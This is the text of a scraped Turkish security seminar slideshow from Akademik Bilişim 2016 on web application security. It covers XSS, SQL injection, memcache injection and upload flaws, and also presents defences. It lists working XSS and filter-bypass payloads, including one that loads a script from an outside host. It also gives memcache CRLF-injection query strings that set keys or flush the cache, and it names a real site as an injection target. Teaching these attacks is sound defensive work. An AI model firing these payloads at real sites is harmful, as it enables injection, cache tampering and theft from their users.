Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Web Uygulama Güvenliği (Akademik Bilişim 2016)

2,253 views

Published on

Akademik Bilişim 2016 etkinliği kapsamında Aydın Adnan Menderes Üniversitesi'nde vermiş olduğum seminerin sunumu.

Published in: Internet
  • Be the first to comment

Web Uygulama Güvenliği (Akademik Bilişim 2016)

  1. 1. Web Uygulama Güvenliği Akademik Bilişim 2016 Ömer Çıtak
  2. 2. #! whoami Full-Stack Developer @ Cydets Inc. development && security www.omercitak.com Social : @Om3rCitak
  3. 3. #! cat index • Cross-site Scripting (XSS) • SQL Injection • Memcache Injection • Upload Authentication
  4. 4. #! ping-pong.jpg
  5. 5. #! dont-trust-anyone.jpg
  6. 6. #! cross-site-scripting • Reflected XSS • DOM Based XSS • Stored XSS
  7. 7. #! reflected-xss.jpg
  8. 8. #! reflected-xss-poc.jpg
  9. 9. #! dom-based-xss.jpg
  10. 10. #! stored-xss.jpg
  11. 11. #! stored-xss-poc.jpg
  12. 12. #! stored-xss-poc.jpg
  13. 13. #! cat classic-xss-payloads • <script>alert(1)</script> • <img src="javascript:alert('XSS');"> • <IFRAME SRC="javascript:alert('XSS');"></IFRAME> • <SCRIPT a=">" SRC="http://omercitak.com/xss.js"></SCRIPT> • <video src=1 onerror=alert(1)> • <audio src=1 onerror=alert(1)> • <img src=x onerror=alert(1)">
  14. 14. #! cat xss-bypass-payloads • <scrscriptipt>alalertert(1)</scrscriptipt> • alert(String.fromCharCode(88,83,83)) • <IMG SRC=j&#97…………….')> • <IMG SRC='vbscript:msgbox("XSS")'>
  15. 15. #! xss-protection-1.jpg • Strip Tags – http://php.net/manual/tr/function.strip-tags.php
  16. 16. #! xss-protection-2.jpg • HTML Special Chars – http://php.net/manual/tr/function.htmlspecialchars.php
  17. 17. #! xss-protection-3.jpg • HttpOnly Cookies (session_set_cookie_params)
  18. 18. #! xss-protection-4.jpg
  19. 19. #! xss-protection-4.jpg
  20. 20. #! xss-demo.jpg
  21. 21. #! sql-injection • Union Based SQL Injection • Blind SQL Injection • Time Based SQL Injection
  22. 22. #! union-based-sql-injection.jpg
  23. 23. #! sql-injection-login-bypass.jpg
  24. 24. #! cat blind-sql-injection • Ya hatalar gizlenmiş ise? (error_reporting(0)) • Ya mysql_* fonksiyonlarının başına «@» konulmuş ise?
  25. 25. #! blind-sql-injection.jpg Reis Yaradan öbür tarafta sormayacak mı reis neden Blind Injection denemedin diye?
  26. 26. #! blind-sql-injection.jpg
  27. 27. #! blind-sql-injection-poc.jpg
  28. 28. #! blind-sql-injection-poc.jpg
  29. 29. #! cat time-based-sql-injection • Ya arka planda çıktı vermeyen bir query çalışıyor ise? – Count Query – Update Query – Insert Query – Delete Query – Relationship Query
  30. 30. #! time-based-sql-injection.jpg
  31. 31. #! time-based-sql-injection.jpg MySQL Server Microsoft SQL Server Oracle Server
  32. 32. #! sql-injection-poc.jpg Uluslararası Af Örgütü (amnesty.org.tr)
  33. 33. #! sql-injection-poc.jpg
  34. 34. #! sql-injection-demo.jpg
  35. 35. #! memcache-injection
  36. 36. #! using-memcache.jpg
  37. 37. #! phpstorm memcached.php
  38. 38. #! telnet 127.0.0.1 11211 > set key 0 10 5 > value < STORED > get key < VALUE key 0 5 < value < END
  39. 39. #! phpstorm memcached.php
  40. 40. #! phpstorm memcached.php
  41. 41. #! phpstorm memcached.php
  42. 42. #! phpstorm memcached.php
  43. 43. #! phpstorm memcached.php ?key=omer 0 10 6 rn hacked rn • urlencode(‘r’) = %0d • urlencode(‘n’) = %0a ?key=omer 0 10 6 %0d%0a hacked %0d%0a
  44. 44. #! phpstorm memcached.php > set omer 0 3600 6 > hacked < STORED > 123456 < ERROR
  45. 45. #! phpstorm memcached.php ?key=aaaaa…(251) set yenikey 0 3600 6 %0d%0a hacked %0d%0a ?key=a %00 set yenikey 0 3600 6 %0d%0a hacked %0d%0a ?key=aaaaa…(251) flush_all %0d%0a
  46. 46. #! cat vulnerable-libraries Python : Python-pylibmc Php : Memcached Asp.Net : memcacheddotnetproject (1.1.5) Java : com.meetup.memcached
  47. 47. #! cat safe_libraries Python : python-memcache Php : memcache Java : java.net.spy.memcached
  48. 48. #! cat using-memcached-library Wordpress Joomla 3.2.2 Piwik 2.1.0 MODX Revolution 2.3
  49. 49. #! ascii-table.jpg
  50. 50. #! phpstorm memcached.php
  51. 51. #! upload-authentication
  52. 52. #! upload-authentication-poc
  53. 53. #! wget questions
  54. 54. #! exit Thanks <3 www.omercitak.com Social : @Om3rCitak

×